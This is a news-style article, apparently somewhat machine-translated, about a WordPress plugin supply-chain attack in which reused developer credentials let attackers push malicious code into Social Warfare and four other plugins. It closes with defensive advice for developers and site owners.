Threat Intelligence team identified a significant attack on the WordPress supply chain, affecting several popular plugins on websites .
According to Wordfence , the Social Warfare plugin was compromised by malware via the WordPress repository , resulting in the insertion of malicious administrative accounts, SEO spam, and even cryptocurrency miners into website footers.
Approximately 35,000 websites may have been affected by this attack, although it is unclear how many have updated to a vulnerable version.
How did the attack occur?
The incident was the result of reused credentials on WordPress.org developer accounts, as noted in the official WordPress.org statement. Five developer accounts with commit access were compromised due to the use of passwords found in external data breaches.
This practice allowed attackers to compromise accounts twitter data and insert malicious code into affected plugins without immediate detection.
Analysis of affected plugins
Affected plugins include:
website creation or optimization
Social Warfare;
Blaze Widget;
Wrapper Link Element;
Contact Form 7 Multi-Step Addon;
Simply Show Hooks.
Each of these plugins had specific vulnerable versions that were later fixed by removing the malicious code and adding measures to invalidate administrator passwords.
Security team investigation and conclusions
During the investigation, it was observed that the malicious compromises showed no clear correlation between plugin authors, suggesting that the attackers exploited individual compromised accounts rather than compromising the WordPress.org infrastructure.
The lack of sophistication in the malicious code and the use of detailed comments also indicate possible automation or use of AI tools in creating the malware.
Preventive measures for developers and companies
To prevent future supply chain attacks like this, it is critical that developers and organizations adopt robust security practices:
Email Release Confirmation : Use the release confirmation functionality available on WordPress.org to validate all plugin and theme releases;
Strong passwords and two-factor authentication : Implement strong, unique passwords for all accounts with commit access, and enable two-factor authentication for an additional layer of security.
Independent monitoring and review : Keep a constant watch on plugin and theme updates, checking each new commit for suspicious activity.
Recommendations for WordPress Website Owners
For WordPress website owners, it is recommended to:
manual plugin and theme updates : disable automatic updates and review the code of each plugin and theme before applying updates manually;
avoid abandoned plugins : avoid using unmaintained plugins, as they pose a greater risk due to lack of security updates;
Regular malware scanning : Implement regular malware scans to detect any malicious activity on your website.